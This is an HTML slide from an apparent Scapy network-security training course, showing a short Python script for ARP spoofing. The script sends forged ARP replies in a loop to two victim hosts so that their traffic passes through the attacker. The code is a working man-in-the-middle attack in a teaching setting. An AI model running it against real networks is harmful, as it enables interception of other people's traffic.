<!DOCTYPE HTML>

<html>

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<title>ARP Spoofing</title>
  <link rel="stylesheet" href="styles.css">

<style>
body {
    font-family: sans-serif;
    font-size: 2em;
}

html, body {
    height: 90%;
    width: 95%;
    margin-left: auto;
    margin-right: auto;
    padding: 10px 0px 0px 10px;
}

header {
    text-align: center;
}


h1 {
    font-size: 1.8em;
    margin: 5px 0px 50px 0px;
}


img {
    max-height: 600px;
    max-width: 1200px;
    vertical-align: middle;
    display: block;
    margin-left: auto;
    margin-right: auto;
    width: auto;
    height: auto;
}

#next, #prev {
    visibility: hidden;
    display: none;
}

ul {
    list-style-type:square;
}

li {
    margin-top: .75em;
    margin-bottom: .75em;
}

footer {
    text-align: center;
    width: 95%;
    position: fixed;
    bottom: 0px;
    font-size: .7em;
    margin: 0px 0px 0px 0px;
}

</style>


</head>

<body>

	<section style="height: 80%">
	
		<article>
            <h1>ARP Spoofing</h1>
<div class="codehilite"><pre><span></span><span class="n">victim1</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">victim2</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>

<span class="n">mac1</span> <span class="o">=</span> <span class="n">getmacbyip</span><span class="p">(</span><span class="n">victim1</span><span class="p">)</span>
<span class="n">mac2</span> <span class="o">=</span> <span class="n">getmacbyip</span><span class="p">(</span><span class="n">victim2</span><span class="p">)</span>

<span class="n">pkt1</span> <span class="o">=</span> <span class="n">Ether</span><span class="p">(</span><span class="n">dst</span><span class="o">=</span><span class="n">mac1</span><span class="p">)</span><span class="o">/</span><span class="n">ARP</span><span class="p">(</span><span class="n">op</span><span class="o">=</span><span class="s2">&quot;is-at&quot;</span><span class="p">,</span> <span class="n">psrc</span><span class="o">=</span><span class="n">victim2</span><span class="p">,</span> <span class="n">pdst</span><span class="o">=</span><span class="n">victim1</span><span class="p">,</span> <span class="n">hwdst</span><span class="o">=</span><span class="n">mac1</span><span class="p">)</span>
<span class="n">pkt2</span> <span class="o">=</span> <span class="n">Ether</span><span class="p">(</span><span class="n">dst</span><span class="o">=</span><span class="n">mac2</span><span class="p">)</span><span class="o">/</span><span class="n">ARP</span><span class="p">(</span><span class="n">op</span><span class="o">=</span><span class="s2">&quot;is-at&quot;</span><span class="p">,</span> <span class="n">psrc</span><span class="o">=</span><span class="n">victim1</span><span class="p">,</span> <span class="n">pdst</span><span class="o">=</span><span class="n">victim2</span><span class="p">,</span> <span class="n">hwdst</span><span class="o">=</span><span class="n">mac2</span><span class="p">)</span>

<span class="k">while</span> <span class="mi">1</span><span class="p">:</span>
    <span class="n">sendp</span><span class="p">(</span><span class="n">pkt1</span><span class="p">)</span>
    <span class="n">sendp</span><span class="p">(</span><span class="n">pkt2</span><span class="p">)</span>

    <span class="nb">print</span><span class="p">(</span><span class="n">pkt1</span><span class="o">.</span><span class="n">summary</span><span class="p">())</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">pkt2</span><span class="o">.</span><span class="n">summary</span><span class="p">())</span>

    <span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</pre></div>
		</article>

	</section>

	<footer valign="bottom">

        
        <a id="prev" href=page30.html>Prev</a>
        

        
        <a id="next" href=page32.html>Next</a>
        

		<p>Securetia - Make Your Own Network Security Tools With Scapy &copy; 2018</p>
        <img style="float: right; position: absolute; width: 180px; right: 50px; bottom: 10px;" src="logo.png" />
	</footer>

<script>

document.onkeydown = checkKey;

function checkKey(e) {

    e = e || window.event;

    if (e.keyCode == '37') {
        document.getElementById('prev').click();
    } else if (e.keyCode == '39') {
        document.getElementById('next').click();
    }
}

</script>

</body>

</html>

